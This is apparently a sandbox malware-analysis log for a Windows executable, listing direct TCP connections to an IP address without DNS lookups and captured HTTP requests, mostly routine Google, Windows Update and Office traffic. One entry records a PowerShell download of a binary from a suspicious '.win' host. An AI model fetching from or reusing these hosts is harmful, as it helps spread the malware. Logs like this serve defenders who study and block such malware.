Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C59CC60 PR_Recv,

0_2_6C59CC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OBm961D2gu3cWPK&MD=+Mp5K1lN HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OBm961D2gu3cWPK&MD=+Mp5K1lN HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120100v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /downloaded_file.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: woo097878781.winConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
